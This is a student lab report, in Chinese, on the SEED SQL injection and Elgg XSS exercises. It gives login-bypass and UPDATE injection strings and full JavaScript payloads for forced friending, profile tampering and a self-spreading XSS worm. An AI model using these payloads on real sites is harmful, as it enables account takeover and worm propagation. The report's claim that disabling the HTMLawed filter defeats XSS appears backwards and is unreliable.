20231905 2023-2024-2 《网络攻防实践》实践十报告

20231905 2023-2024-2 《网络攻防实践》实践十报告

1.实践内容

1.1 SEED SQL注入攻击与防御实验

我们已经创建了一个Web应用程序，并将其托管在 三达不溜.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色：管理员是特权角色，可以管理每个员工的个人资料信息。员工是一般角色，可以查看或更新自己的个人资料信息。完成以下任务：

• 熟悉SQL语句： 我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。

• 对SELECT语句的SQL注入攻击：上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。

• 对UPDATE语句的SQL注入攻击：通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

• SQL对抗：修复上述SQL注入攻击漏洞。

1.2 SEED XSS跨站脚本攻击实验(Elgg)

为了演示攻击者可以利用XSS漏洞做什么，我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中，学生需要利用此漏洞对经过修改的Elgg发起XSS攻击，攻击的最终目的是在用户之间传播XSS蠕虫，这样，无论是谁查看的受感染用户个人资料都将被感染。

• 发布恶意消息，显示警报窗口：在您的Elgg配置文件中嵌入一个JavaScript程序，以便当另一个用户查看您的配置文件时，将执行JavaScript程序并显示一个警报窗口。

• 弹窗显示cookie信息：将cookie信息显示。

• 窃取受害者的cookies：将cookie发送给攻击者。

• 成为受害者的朋友：使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程。

• 修改受害者的信息：使用js程序使得受害者在访问Alice的页面时，资料无需干预却被修改。

• 编写XSS蠕虫。

• 对抗XSS攻击。

2.实践过程

2.1 熟悉SQL语句

执行sudo service apache2 start启动apache 密码dees。
使用命令 mysql -u root -pseedubuntu 登录MySQL数据库，密码是seedubuntu。

利用命令 show databases查看mysql中的数据库。

利用指令 use Users; 和 show tables;查看Users数据库中的所有表。

使用sql语句 select * from credential; 查看credential记录。

使用sql语句 select * from credential where Name = ‘Ted’; 查询Name为Ted的相关记录

2.2 对SELECT语句的SQL注入攻击

上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。先在浏览器中输入 www.SEEDLabSQLInjection.com 进入已经搭建好的Web页面

右键查看网页源码

可以发现登陆的表单中使用 get 方法访问 unsafe_home.php

在终端输入vim /var/www/SQLInjection/unsafe_home.php 打开unsafe_home.php文件，查看源代码。得知该web应用的数据库用户为root，密码为seedubuntu

进行登录认证时，会区分admin用户及其他用户，用户信息表名为credential

根据上面信息，构造 Admin’#，就可以让SQL语句提前结束，而不进行密码校验。其中，#可将密码校验的部分注释掉。实践可以发现，成功进入系统，并可以查看到所有的用户信息。

2.3 对UPDATE语句的SQL注入攻击

查看 Edit_Profile 页面的源代码

发现表单依旧是以 get 方式将数据发到 unsafe_edit_backend.php 页面。

执行vim /var/www/SQLInjection/unsafe_edit_backend.php，打开unsafe_edit_backend.php文件，在源代码中找到处理update语句的地方，员工只能修改自己的个人信息，而无法修改salary。

构造sql语句’,Salary=‘1905’ where name=‘Admin’;#，输入到NickName一栏，保存，工资修改成功

使用 Admin’# 登录查看，Salary已经改为1905。

2.4 SQL对抗

修复上述SQL注入攻击漏洞。输入vim /var/www/SQLInjection/unsafe_home.php 打开unsafe_home.php 查看其源码。对unsafe_home.php 中的SELECT语句进行修改。
另外对unsafe_edit_backend.php 的UPDATE语句进行修改。

再次使用sql注入攻击无法登录

2.5 SEED XSS跨站脚本攻击实验(Elgg)

2.5.1 XSS攻击

浏览器中访问 http://www.xsslabelgg.com。

输入账号：Alice，密码：seedalice 进行登录。

点击头像进入主页，选择 Edit profile，在 Brief description中输入XSS攻击代码 。


点击保存之后，弹出XSS警告弹窗

2.5.2 弹窗显示cookie信息：将cookie信息显示

在 Edit profile 里面的 Brief description 中输入XSS攻击代码。
点击保存，cookie信息弹窗显示。

2.5.3 窃取受害者的cookies：将cookie发送给攻击者

查看seed虚拟机的IP地址，从下图可以看出，IP地址为：192.168.200.3。

构造XSS攻击代码，在 Edit profile 里面的 Brief description 中输入xss攻击代码 保存

使用命令 nc -l 5555 -v 监听5555端口

添加Boby为好友

然后访问Boby，成功得到cookie。

2.5.4 成为受害者的朋友：使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程

按F12打开开发者模式进入Network页面，然后点击和Boby成为好友，这时可以在network中看到网站以POST的方式向http://www.xsslabelgg.com/action/friends/add 提交了参数表单。
申请参数一共有三个，分别是：friend, __elgg_ts, __elgg_token，别分代表着好友的id、时间戳以及token。

登录Alice，构造XSS攻击代码

<script type="text/javascript">
	window.onload = function () {
	var Ajax=null;
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;


	//Construct the HTTP request to add Boby as a friend.
	var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;

	//Create and send Ajax request to add friend
	Ajax=new XMLHttpRequest();
	Ajax.open("GET",sendurl,true);
	Ajax.setRequestHeader("Host","www.xsslabelgg.com");
	Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
	Ajax.send();
}
</script>

将该段代码放到Alice的 About me 下并在Visual editor 界面保存

登录Boby账号，密码：seedboby。

访问Alice界面,刷新Boby账号，发现Boby已自动添加Alice为好友，攻击成功。

2.5.5 修改受害者的信息

构造JS代码

<script type="text/javascript">
	window.onload = function(){
    	var userName=elgg.session.user.name;
    	var guid="&guid="+elgg.session.user.guid;
    	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    	var token="&__elgg_token="+elgg.security.token.__elgg_token;

    	var content= token + ts + "name=" + userName + "&description=<p>this account has been changed by xss attack from 20231905tsc.</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
    	var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
    	alert(content)
    	//FILL IN
    	var samyGuid=44;
    	//FILL IN
    	if(elgg.session.user.guid!=samyGuid)
    	{
        	var Ajax=null;
        	Ajax=new XMLHttpRequest();
        	Ajax.open("POST",sendurl,true);
        	Ajax.setRequestHeader("Host","www.xsslabelgg.com");
        	Ajax.setRequestHeader("Content-Type",
        	"application/x-www-form-urlencoded");
        	Ajax.send(content);
    	}
	}
</script>

在Alice的编辑界面的About me 一栏的Visual editor 界面输入构造的JS代码，并保存。

此时登录Boby账号。访问Alice界面后刷新，发现Boby的About me 被攻击成功。

2.5.6 编写XSS蠕虫

构造JS代码

<script id="worm" type="text/javascript">
	window.onload = function(){
		var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
		var jsCode = document.getElementById("worm").innerHTML;
		var tailTag = "</" + "script>"; 
		var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

		var userName=elgg.session.user.name;
		var guid="&guid="+elgg.session.user.guid;
		var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
		var token="&__elgg_token="+elgg.security.token.__elgg_token;

		//Construct the content of your url.
		var content= token + ts + "&name=" + userName + "&description=<p>20231905tsc"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
		var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
		alert(content)

		var samyGuid=44;

		if(elgg.session.user.guid!=samyGuid)
		{
			var Ajax=null;
			Ajax=new XMLHttpRequest();
			Ajax.open("POST",sendurl,true);
			Ajax.setRequestHeader("Host","www.xsslabelgg.com");
			Ajax.setRequestHeader("Content-Type",
			"application/x-www-form-urlencoded");
			Ajax.send(content);
		}
	
	}
</script>

在Alice的编辑界面的About me 一栏输入构造的JS代码，并保存。此时切换账户让Boby去访问Alice主页。同时，蠕虫病毒已经侵染了Boby的主页。

登录Admin访问Boby的主页，Admin就成为了二级感染者。

2.5.7 对抗XSS攻击

登录Admin的账号（账号：Admin 密码：seedelgg）。依次选择Account->Administration->plugins，点击HTMLawed，使它不可用。

再次登录Boby账号，发现XSS蠕虫攻击已经失效。

3.学习中遇到的问题及解决

• 问题1：输入SQL语句没有对应输出
• 问题1解决方案：发现语句后没有加分号
• 问题2：seed提权没有响应
• 问题2解决方案：修改主机名之后，提权命令响应较慢，需要等待一段时间
• 问题3：.php文件无法编辑
• 问题3解决方案：只读文件，进行提权之后可以编辑

4.实践总结

本次实验主要涉及SQL注入和XSS攻击，需要了解Web相关信息，想要继续深入，需要更多的了解html js等相关技术，通过自己动手一步一步实践的攻击更有成就感。